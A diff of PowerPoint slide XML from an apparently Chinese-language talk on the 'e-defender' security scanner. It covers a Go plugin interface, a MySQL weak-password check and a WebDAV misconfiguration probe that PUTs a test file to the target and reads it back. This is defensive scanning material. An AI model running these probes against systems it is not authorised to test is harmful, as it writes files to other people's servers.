+                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7C62A8A7-AF2A-6845-ACED-09D6760A16E1}"/>
               </a:ext>
             </a:extLst>
           </p:cNvPr>
@@ -8428,8 +8428,8 @@
         </p:nvSpPr>
         <p:spPr>
           <a:xfrm>
-            <a:off x="1791222" y="0"/>
-            <a:ext cx="8154444" cy="6278257"/>
+            <a:off x="1728592" y="1578279"/>
+            <a:ext cx="8680537" cy="923330"/>
           </a:xfrm>
           <a:prstGeom prst="rect">
             <a:avLst/>
@@ -8442,551 +8442,102 @@
           </a:bodyPr>
           <a:lstStyle/>
           <a:p>
-            <a:pPr>
-              <a:lnSpc>
-                <a:spcPts val="1340"/>
-              </a:lnSpc>
-            </a:pPr>
-            <a:br>
-              <a:rPr lang="en" altLang="zh-CN" dirty="0"/>
-            </a:br>
+            <a:r>
+              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0"/>
+              <a:t>Web</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0"/>
+              <a:t> </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
+              <a:t>dav</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0"/>
+              <a:t>模块会检测</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0"/>
+              <a:t>web</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0"/>
+              <a:t>服务器是否</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
+              <a:t>开启了</a:t>
+            </a:r>
             <a:r>
               <a:rPr lang="en" altLang="zh-CN" dirty="0" err="1"/>
-              <a:t>func</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en" altLang="zh-CN" dirty="0"/>
-              <a:t> (d *</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en" altLang="zh-CN" dirty="0" err="1"/>
-              <a:t>webDav</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en" altLang="zh-CN" dirty="0"/>
-              <a:t>) Check(URL string, meta </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en" altLang="zh-CN" dirty="0" err="1"/>
-              <a:t>plugin.TaskMeta</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en" altLang="zh-CN" dirty="0"/>
-              <a:t>) bool {</a:t>
-            </a:r>
-            <a:br>
-              <a:rPr lang="en" altLang="zh-CN" dirty="0"/>
-            </a:br>
-            <a:r>
-              <a:rPr lang="en" altLang="zh-CN" dirty="0"/>
-              <a:t>   </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en" altLang="zh-CN" dirty="0" err="1"/>
-              <a:t>fmt.Println</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en" altLang="zh-CN" dirty="0"/>
-              <a:t>(URL)</a:t>
-            </a:r>
-            <a:br>
-              <a:rPr lang="en" altLang="zh-CN" dirty="0"/>
-            </a:br>
-            <a:r>
-              <a:rPr lang="en" altLang="zh-CN" dirty="0"/>
-              <a:t>   </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en" altLang="zh-CN" dirty="0" err="1"/>
-              <a:t>putURL</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en" altLang="zh-CN" dirty="0"/>
-              <a:t> := URL + "/" + </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en" altLang="zh-CN" dirty="0" err="1"/>
-              <a:t>util.GetRandomString</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en" altLang="zh-CN" dirty="0"/>
-              <a:t>(6) + ".txt"</a:t>
-            </a:r>
-            <a:br>
-              <a:rPr lang="en" altLang="zh-CN" dirty="0"/>
-            </a:br>
-            <a:r>
-              <a:rPr lang="en" altLang="zh-CN" dirty="0"/>
-              <a:t>   request, err := </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en" altLang="zh-CN" dirty="0" err="1"/>
-              <a:t>http.NewRequest</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en" altLang="zh-CN" dirty="0"/>
-              <a:t>("PUT", </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en" altLang="zh-CN" dirty="0" err="1"/>
-              <a:t>putURL</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en" altLang="zh-CN" dirty="0"/>
-              <a:t>, </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en" altLang="zh-CN" dirty="0" err="1"/>
-              <a:t>strings.NewReader</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en" altLang="zh-CN" dirty="0"/>
-              <a:t>("</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en" altLang="zh-CN" dirty="0" err="1"/>
-              <a:t>vultest</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en" altLang="zh-CN" dirty="0"/>
-              <a:t>"))</a:t>
-            </a:r>
-            <a:br>
-              <a:rPr lang="en" altLang="zh-CN" dirty="0"/>
-            </a:br>
-            <a:r>
-              <a:rPr lang="en" altLang="zh-CN" dirty="0"/>
-              <a:t>   if err != nil {</a:t>
-            </a:r>
-            <a:br>
-              <a:rPr lang="en" altLang="zh-CN" dirty="0"/>
-            </a:br>
-            <a:r>
-              <a:rPr lang="en" altLang="zh-CN" dirty="0"/>
-              <a:t>      </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en" altLang="zh-CN" dirty="0" err="1"/>
-              <a:t>fmt.Println</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en" altLang="zh-CN" dirty="0"/>
-              <a:t>(</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en" altLang="zh-CN" dirty="0" err="1"/>
-              <a:t>err.Error</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en" altLang="zh-CN" dirty="0"/>
-              <a:t>())</a:t>
-            </a:r>
-            <a:br>
-              <a:rPr lang="en" altLang="zh-CN" dirty="0"/>
-            </a:br>
-            <a:r>
-              <a:rPr lang="en" altLang="zh-CN" dirty="0"/>
-              <a:t>      </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en" altLang="zh-CN" dirty="0" err="1"/>
-              <a:t>log.Error</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en" altLang="zh-CN" dirty="0"/>
-              <a:t>(err)</a:t>
-            </a:r>
-            <a:br>
-              <a:rPr lang="en" altLang="zh-CN" dirty="0"/>
-            </a:br>
-            <a:r>
-              <a:rPr lang="en" altLang="zh-CN" dirty="0"/>
-              <a:t>      return false</a:t>
-            </a:r>
-            <a:br>
-              <a:rPr lang="en" altLang="zh-CN" dirty="0"/>
-            </a:br>
-            <a:r>
-              <a:rPr lang="en" altLang="zh-CN" dirty="0"/>
-              <a:t>   }</a:t>
-            </a:r>
-            <a:br>
-              <a:rPr lang="en" altLang="zh-CN" dirty="0"/>
-            </a:br>
-            <a:r>
-              <a:rPr lang="en" altLang="zh-CN" dirty="0"/>
-              <a:t>   _, err = </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en" altLang="zh-CN" dirty="0" err="1"/>
-              <a:t>util.RequestDo</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en" altLang="zh-CN" dirty="0"/>
-              <a:t>(request, false, 15)</a:t>
-            </a:r>
-            <a:br>
-              <a:rPr lang="en" altLang="zh-CN" dirty="0"/>
-            </a:br>
-            <a:r>
-              <a:rPr lang="en" altLang="zh-CN" dirty="0"/>
-              <a:t>   if err != nil {</a:t>
-            </a:r>
-            <a:br>
-              <a:rPr lang="en" altLang="zh-CN" dirty="0"/>
-            </a:br>
-            <a:r>
-              <a:rPr lang="en" altLang="zh-CN" dirty="0"/>
-              <a:t>      </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en" altLang="zh-CN" dirty="0" err="1"/>
-              <a:t>fmt.Println</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en" altLang="zh-CN" dirty="0"/>
-              <a:t>(</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en" altLang="zh-CN" dirty="0" err="1"/>
-              <a:t>err.Error</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en" altLang="zh-CN" dirty="0"/>
-              <a:t>())</a:t>
-            </a:r>
-            <a:br>
-              <a:rPr lang="en" altLang="zh-CN" dirty="0"/>
-            </a:br>
-            <a:r>
-              <a:rPr lang="en" altLang="zh-CN" dirty="0"/>
-              <a:t>      </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en" altLang="zh-CN" dirty="0" err="1"/>
-              <a:t>log.Error</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en" altLang="zh-CN" dirty="0"/>
-              <a:t>(err)</a:t>
-            </a:r>
-            <a:br>
-              <a:rPr lang="en" altLang="zh-CN" dirty="0"/>
-            </a:br>
-            <a:r>
-              <a:rPr lang="en" altLang="zh-CN" dirty="0"/>
-              <a:t>      return false</a:t>
-            </a:r>
-            <a:br>
-              <a:rPr lang="en" altLang="zh-CN" dirty="0"/>
-            </a:br>
-            <a:r>
-              <a:rPr lang="en" altLang="zh-CN" dirty="0"/>
-              <a:t>   }</a:t>
-            </a:r>
-            <a:br>
-              <a:rPr lang="en" altLang="zh-CN" dirty="0"/>
-            </a:br>
-            <a:r>
-              <a:rPr lang="en" altLang="zh-CN" dirty="0"/>
-              <a:t>   </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en" altLang="zh-CN" dirty="0" err="1"/>
-              <a:t>vRequest</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en" altLang="zh-CN" dirty="0"/>
-              <a:t>, err := </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en" altLang="zh-CN" dirty="0" err="1"/>
-              <a:t>http.NewRequest</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en" altLang="zh-CN" dirty="0"/>
-              <a:t>("GET", </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en" altLang="zh-CN" dirty="0" err="1"/>
-              <a:t>putURL</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en" altLang="zh-CN" dirty="0"/>
-              <a:t>, nil)</a:t>
-            </a:r>
-            <a:br>
-              <a:rPr lang="en" altLang="zh-CN" dirty="0"/>
-            </a:br>
-            <a:r>
-              <a:rPr lang="en" altLang="zh-CN" dirty="0"/>
-              <a:t>   if err != nil {</a:t>
-            </a:r>
-            <a:br>
-              <a:rPr lang="en" altLang="zh-CN" dirty="0"/>
-            </a:br>
-            <a:r>
-              <a:rPr lang="en" altLang="zh-CN" dirty="0"/>
-              <a:t>      </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en" altLang="zh-CN" dirty="0" err="1"/>
-              <a:t>fmt.Println</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en" altLang="zh-CN" dirty="0"/>
-              <a:t>(</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en" altLang="zh-CN" dirty="0" err="1"/>
-              <a:t>err.Error</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en" altLang="zh-CN" dirty="0"/>
-              <a:t>())</a:t>
-            </a:r>
-            <a:br>
-              <a:rPr lang="en" altLang="zh-CN" dirty="0"/>
-            </a:br>
-            <a:r>
-              <a:rPr lang="en" altLang="zh-CN" dirty="0"/>
-              <a:t>      </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en" altLang="zh-CN" dirty="0" err="1"/>
-              <a:t>log.Error</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en" altLang="zh-CN" dirty="0"/>
-              <a:t>(err)</a:t>
-            </a:r>
-            <a:br>
-              <a:rPr lang="en" altLang="zh-CN" dirty="0"/>
-            </a:br>
-            <a:r>
-              <a:rPr lang="en" altLang="zh-CN" dirty="0"/>
-              <a:t>      return false</a:t>
-            </a:r>
-            <a:br>
-              <a:rPr lang="en" altLang="zh-CN" dirty="0"/>
-            </a:br>
-            <a:r>
-              <a:rPr lang="en" altLang="zh-CN" dirty="0"/>
-              <a:t>   }</a:t>
-            </a:r>
-            <a:br>
-              <a:rPr lang="en" altLang="zh-CN" dirty="0"/>
-            </a:br>
-            <a:r>
-              <a:rPr lang="en" altLang="zh-CN" dirty="0"/>
-              <a:t>   resp, err := </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en" altLang="zh-CN" dirty="0" err="1"/>
-              <a:t>util.RequestDo</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en" altLang="zh-CN" dirty="0"/>
-              <a:t>(</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en" altLang="zh-CN" dirty="0" err="1"/>
-              <a:t>vRequest</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en" altLang="zh-CN" dirty="0"/>
-              <a:t>, true, 15)</a:t>
-            </a:r>
-            <a:br>
-              <a:rPr lang="en" altLang="zh-CN" dirty="0"/>
-            </a:br>
-            <a:r>
-              <a:rPr lang="en" altLang="zh-CN" dirty="0"/>
-              <a:t>   if err != nil {</a:t>
-            </a:r>
-            <a:br>
-              <a:rPr lang="en" altLang="zh-CN" dirty="0"/>
-            </a:br>
-            <a:r>
-              <a:rPr lang="en" altLang="zh-CN" dirty="0"/>
-              <a:t>      </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en" altLang="zh-CN" dirty="0" err="1"/>
-              <a:t>fmt.Println</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en" altLang="zh-CN" dirty="0"/>
-              <a:t>(</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en" altLang="zh-CN" dirty="0" err="1"/>
-              <a:t>err.Error</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en" altLang="zh-CN" dirty="0"/>
-              <a:t>())</a:t>
-            </a:r>
-            <a:br>
-              <a:rPr lang="en" altLang="zh-CN" dirty="0"/>
-            </a:br>
-            <a:r>
-              <a:rPr lang="en" altLang="zh-CN" dirty="0"/>
-              <a:t>      </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en" altLang="zh-CN" dirty="0" err="1"/>
-              <a:t>log.Error</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en" altLang="zh-CN" dirty="0"/>
-              <a:t>(err)</a:t>
-            </a:r>
-            <a:br>
-              <a:rPr lang="en" altLang="zh-CN" dirty="0"/>
-            </a:br>
-            <a:r>
-              <a:rPr lang="en" altLang="zh-CN" dirty="0"/>
-              <a:t>      return false</a:t>
-            </a:r>
-            <a:br>
-              <a:rPr lang="en" altLang="zh-CN" dirty="0"/>
-            </a:br>
-            <a:r>
-              <a:rPr lang="en" altLang="zh-CN" dirty="0"/>
-              <a:t>   }</a:t>
-            </a:r>
-            <a:br>
-              <a:rPr lang="en" altLang="zh-CN" dirty="0"/>
-            </a:br>
-            <a:r>
-              <a:rPr lang="en" altLang="zh-CN" dirty="0"/>
-              <a:t>   if </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en" altLang="zh-CN" dirty="0" err="1"/>
-              <a:t>strings.Contains</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en" altLang="zh-CN" dirty="0"/>
-              <a:t>(</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en" altLang="zh-CN" dirty="0" err="1"/>
-              <a:t>resp.ResponseRaw</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en" altLang="zh-CN" dirty="0"/>
-              <a:t>, "</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en" altLang="zh-CN" dirty="0" err="1"/>
-              <a:t>vultest</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en" altLang="zh-CN" dirty="0"/>
-              <a:t>") {</a:t>
-            </a:r>
-            <a:br>
-              <a:rPr lang="en" altLang="zh-CN" dirty="0"/>
-            </a:br>
-            <a:r>
-              <a:rPr lang="en" altLang="zh-CN" dirty="0"/>
-              <a:t>      result := </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en" altLang="zh-CN" dirty="0" err="1"/>
-              <a:t>d.info</a:t>
-            </a:r>
-            <a:br>
-              <a:rPr lang="en" altLang="zh-CN" dirty="0"/>
-            </a:br>
-            <a:r>
-              <a:rPr lang="en" altLang="zh-CN" dirty="0"/>
-              <a:t>      </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en" altLang="zh-CN" dirty="0" err="1"/>
-              <a:t>result.Response</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en" altLang="zh-CN" dirty="0"/>
-              <a:t> = </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en" altLang="zh-CN" dirty="0" err="1"/>
-              <a:t>resp.ResponseRaw</a:t>
-            </a:r>
-            <a:br>
-              <a:rPr lang="en" altLang="zh-CN" dirty="0"/>
-            </a:br>
-            <a:r>
-              <a:rPr lang="en" altLang="zh-CN" dirty="0"/>
-              <a:t>      </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en" altLang="zh-CN" dirty="0" err="1"/>
-              <a:t>result.Request</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en" altLang="zh-CN" dirty="0"/>
-              <a:t> = </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en" altLang="zh-CN" dirty="0" err="1"/>
-              <a:t>resp.RequestRaw</a:t>
-            </a:r>
-            <a:br>
-              <a:rPr lang="en" altLang="zh-CN" dirty="0"/>
-            </a:br>
-            <a:r>
-              <a:rPr lang="en" altLang="zh-CN" dirty="0"/>
-              <a:t>      </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en" altLang="zh-CN" dirty="0" err="1"/>
-              <a:t>d.result</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en" altLang="zh-CN" dirty="0"/>
-              <a:t> = append(</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en" altLang="zh-CN" dirty="0" err="1"/>
-              <a:t>d.result</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en" altLang="zh-CN" dirty="0"/>
-              <a:t>, result)</a:t>
-            </a:r>
-            <a:br>
-              <a:rPr lang="en" altLang="zh-CN" dirty="0"/>
-            </a:br>
-            <a:r>
-              <a:rPr lang="en" altLang="zh-CN" dirty="0"/>
-              <a:t>      return true</a:t>
-            </a:r>
-            <a:br>
-              <a:rPr lang="en" altLang="zh-CN" dirty="0"/>
-            </a:br>
-            <a:r>
-              <a:rPr lang="en" altLang="zh-CN" dirty="0"/>
-              <a:t>   }</a:t>
-            </a:r>
-            <a:br>
-              <a:rPr lang="en" altLang="zh-CN" dirty="0"/>
-            </a:br>
-            <a:r>
-              <a:rPr lang="en" altLang="zh-CN" dirty="0"/>
-              <a:t>   return false</a:t>
-            </a:r>
-            <a:br>
-              <a:rPr lang="en" altLang="zh-CN" dirty="0"/>
-            </a:br>
-            <a:r>
-              <a:rPr lang="en" altLang="zh-CN" dirty="0"/>
-              <a:t>}</a:t>
-            </a:r>
+              <a:t>WebDav</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
+              <a:t>且配置不当导致攻击者可上传文件到</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en" altLang="zh-CN" dirty="0"/>
+              <a:t>web</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
+              <a:t>目录，实现逻辑就是会尝试发起</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
+              <a:t>put</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
+              <a:t>请求，然后想服务器发送一个测试文件，然后再使用</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
+              <a:t>get</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
+              <a:t>请求，看看能不能获取这个文件，代码在下面的一个</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
+              <a:t>ppt</a:t>
+            </a:r>
+            <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0"/>
+          </a:p>
+        </p:txBody>
+      </p:sp>
+      <p:sp>
+        <p:nvSpPr>
+          <p:cNvPr id="4" name="文本框 3">
+            <a:extLst>
+              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
+                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3288819B-A848-2E4D-8B59-86723555BBF2}"/>
+              </a:ext>
+            </a:extLst>
+          </p:cNvPr>
+          <p:cNvSpPr txBox="1"/>
+          <p:nvPr/>
+        </p:nvSpPr>
+        <p:spPr>
+          <a:xfrm>
+            <a:off x="1227551" y="2818356"/>
+            <a:ext cx="10258816" cy="3569918"/>
+          </a:xfrm>
+          <a:prstGeom prst="rect">
+            <a:avLst/>
+          </a:prstGeom>
+          <a:noFill/>
+        </p:spPr>
+        <p:txBody>
+          <a:bodyPr wrap="square" rtlCol="0">
+            <a:spAutoFit/>
+          </a:bodyPr>
+          <a:lstStyle/>
+          <a:p>
             <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0"/>
           </a:p>
         </p:txBody>
@@ -8994,7 +8545,7 @@
     </p:spTree>
     <p:extLst>
       <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
-        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2994534069"/>
+        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="414903076"/>
       </p:ext>
     </p:extLst>
   </p:cSld>
@@ -9023,45 +8574,10 @@
       </p:grpSpPr>
       <p:sp>
         <p:nvSpPr>
-          <p:cNvPr id="2" name="标题 1">
-            <a:extLst>
-              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
-                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E6FE0BDB-C419-7247-93CF-C74DF4D7491C}"/>
-              </a:ext>
-            </a:extLst>
-          </p:cNvPr>
-          <p:cNvSpPr>
-            <a:spLocks noGrp="1"/>
-          </p:cNvSpPr>
-          <p:nvPr>
-            <p:ph type="title"/>
-          </p:nvPr>
-        </p:nvSpPr>
-        <p:spPr>
-          <a:xfrm>
-            <a:off x="913775" y="618518"/>
-            <a:ext cx="10364452" cy="583982"/>
-          </a:xfrm>
-        </p:spPr>
-        <p:txBody>
-          <a:bodyPr>
-            <a:normAutofit fontScale="90000"/>
-          </a:bodyPr>
-          <a:lstStyle/>
-          <a:p>
-            <a:r>
-              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0"/>
-              <a:t>插件化</a:t>
-            </a:r>
-          </a:p>
-        </p:txBody>
-      </p:sp>
-      <p:sp>
-        <p:nvSpPr>
           <p:cNvPr id="4" name="文本框 3">
             <a:extLst>
               <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
-                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{40B0B526-043D-2B47-A559-25A0442DBE05}"/>
+                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EDFD9FA4-EA5D-6344-8EC9-08A4C3502894}"/>
               </a:ext>
             </a:extLst>
           </p:cNvPr>
@@ -9070,8 +8586,8 @@
         </p:nvSpPr>
         <p:spPr>
           <a:xfrm>
-            <a:off x="1816274" y="1490597"/>
-            <a:ext cx="8880953" cy="5078313"/>
+            <a:off x="1791222" y="0"/>
+            <a:ext cx="8154444" cy="6278257"/>
           </a:xfrm>
           <a:prstGeom prst="rect">
             <a:avLst/>
@@ -9084,173 +8600,37 @@
           </a:bodyPr>
           <a:lstStyle/>
           <a:p>
-            <a:r>
-              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0"/>
-              <a:t>e-defender</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0"/>
-              <a:t>和一个比较核心的特性就是插件化，可以支持平滑的拓展，如果有新的功能想要加入，只需要在</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0"/>
-              <a:t>plugin/</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
-              <a:t>goPlugins</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0"/>
-              <a:t>中添加相关函数即可，新添加的这个对象只要实现了如下接口，就是一个可用的插件</a:t>
-            </a:r>
-            <a:endParaRPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0"/>
-          </a:p>
-          <a:p>
-            <a:endParaRPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0"/>
-          </a:p>
-          <a:p>
-            <a:r>
-              <a:rPr lang="en" altLang="zh-CN" dirty="0"/>
-              <a:t>// </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en" altLang="zh-CN" dirty="0" err="1"/>
-              <a:t>GoPlugin</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en" altLang="zh-CN" dirty="0"/>
-              <a:t> </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
-              <a:t>插件接口</a:t>
-            </a:r>
+            <a:pPr>
+              <a:lnSpc>
+                <a:spcPts val="1340"/>
+              </a:lnSpc>
+            </a:pPr>
             <a:br>
-              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
+              <a:rPr lang="en" altLang="zh-CN" dirty="0"/>
             </a:br>
-            <a:r>
-              <a:rPr lang="en" altLang="zh-CN" dirty="0"/>
-              <a:t>type </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en" altLang="zh-CN" dirty="0" err="1"/>
-              <a:t>GoPlugin</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en" altLang="zh-CN" dirty="0"/>
-              <a:t> interface {</a:t>
-            </a:r>
-            <a:br>
-              <a:rPr lang="en" altLang="zh-CN" dirty="0"/>
-            </a:br>
-            <a:r>
-              <a:rPr lang="en" altLang="zh-CN" dirty="0"/>
-              <a:t>   Init() Plugin</a:t>
-            </a:r>
-            <a:br>
-              <a:rPr lang="en" altLang="zh-CN" dirty="0"/>
-            </a:br>
-            <a:r>
-              <a:rPr lang="en" altLang="zh-CN" dirty="0"/>
-              <a:t>   Check(</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en" altLang="zh-CN" dirty="0" err="1"/>
-              <a:t>netloc</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en" altLang="zh-CN" dirty="0"/>
-              <a:t> string, meta </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en" altLang="zh-CN" dirty="0" err="1"/>
-              <a:t>TaskMeta</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en" altLang="zh-CN" dirty="0"/>
-              <a:t>) bool</a:t>
-            </a:r>
-            <a:br>
-              <a:rPr lang="en" altLang="zh-CN" dirty="0"/>
-            </a:br>
-            <a:r>
-              <a:rPr lang="en" altLang="zh-CN" dirty="0"/>
-              <a:t>   </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en" altLang="zh-CN" dirty="0" err="1"/>
-              <a:t>GetResult</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en" altLang="zh-CN" dirty="0"/>
-              <a:t>() []Plugin</a:t>
-            </a:r>
-            <a:br>
-              <a:rPr lang="en" altLang="zh-CN" dirty="0"/>
-            </a:br>
-            <a:r>
-              <a:rPr lang="en" altLang="zh-CN" dirty="0"/>
-              <a:t>}</a:t>
-            </a:r>
-          </a:p>
-          <a:p>
-            <a:endParaRPr kumimoji="1" lang="en" altLang="zh-CN" dirty="0"/>
-          </a:p>
-          <a:p>
-            <a:r>
-              <a:rPr kumimoji="1" lang="zh-CN" altLang="en" dirty="0"/>
-              <a:t>插件</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0"/>
-              <a:t>采用自注册的模式，这里使用了</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0"/>
-              <a:t>go</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0"/>
-              <a:t>语言的一个语法特性，在包初始化的时候将自己注册到</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
-              <a:t>pulgin</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0"/>
-              <a:t>树，如下是</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
-              <a:t>mysql</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0"/>
-              <a:t>弱密码检测插件自注册的代码</a:t>
